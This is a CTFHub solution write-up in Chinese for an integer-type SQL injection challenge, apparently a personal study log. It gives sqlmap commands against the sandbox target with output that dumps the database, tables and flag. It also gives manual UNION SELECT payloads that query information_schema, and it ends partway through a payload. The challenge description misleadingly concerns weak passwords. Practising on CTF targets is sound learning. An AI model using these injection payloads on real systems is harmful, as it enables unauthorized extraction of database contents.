Ctfhub解题 web SQL注入
介绍:记录解题过程
行首输入<3
得:
❤️
❤️
❤️
1.整数型注入
题目描述:通常认为容易被别人(他们有可能对你很了解)猜测到或被破解工具破解的口令均为弱口令。
方法一:sqlmap注入
好用不过sqlmap,直接扫:
<1>.sqlmap爆当前数据库信息
python sqlmap.py -u "http://challenge-f6ea6271f47a5c21.sandbox.ctfhub.com:10080/?id=1" --current-db
[16:29:30] [INFO] fetching current database
current database: 'sqli'
用sqlmap爆出库名:sqli
<2>.sqlmap.列出指定数据库所有的表名
python sqlmap.py -u "http://challenge-f6ea6271f47a5c21.sandbox.ctfhub.com:10080/?id=1" -D sqli --tables
[16:30:07] [INFO] retrieved: 'news'
[16:30:08] [INFO] retrieved: 'flag'
Database: sqli
[2 tables]
+------+
| flag |
| news |
+------+
用sqlmap爆出表名:flag,news
❤️
<3>.sqlmap 列出指定表名的所有列名
python sqlmap.py -u "http://challenge-f6ea6271f47a5c21.sandbox.ctfhub.com:10080/?id=1" -D sqli -T flag --columns
Database: sqli
Table: flag
[1 column]
+--------+--------------+
| Column | Type |
+--------+--------------+
| flag | varchar(100) |
+--------+--------------+
用sqlmap爆出列名:flag
<4>.sqlmap 打印输出表名指定列名字段的值数据
python sqlmap.py -u "http://challenge-f6ea6271f47a5c21.sandbox.ctfhub.com:10080/?id=1" -D sqli -T flag -C flag --dump
拿到flag:
Database: sqli
Table: flag
[1 entry]
+----------------------------------+
| flag |
+----------------------------------+
| ctfhub{
c738d407d82740b4fa840800} |
+----------------------------------+
方法二:手工注入
<1>.使用order by n 语句查询字段数
1 order by 2
select * from news where id=1 order by 2
ID: 1
Data: ctfhub
<2>.使用union联合查询检测信息回显位置
id=-1 union select 1,2
select * from news where id=id=-1 union select 1,2
ID: 1
Data: 2
<3>.获取当前数据库名
id=-1 union select 1,database()
select * from news where id=id=-1 union select 1,database()
ID: 1
Data: sqli
<4>.查询数据库sqli表名
-1 union select 1,group_concat(table_name)from information_schema.tables where table_schema='sqli'
select * from news where id=-1 union select 1,group_concat(table_name)from information_schema.tables where table_schema='sqli'
ID: 1
Data: news,flag
<5>.获取flag列所有字段名
-1 union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='flag'
select * from news where id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='flag'
ID: 1
Data: flag
<6>.获取指定数据库的表的列的内容
-1 union select 1,group_concat(flag) from sqli.flag
-1 union select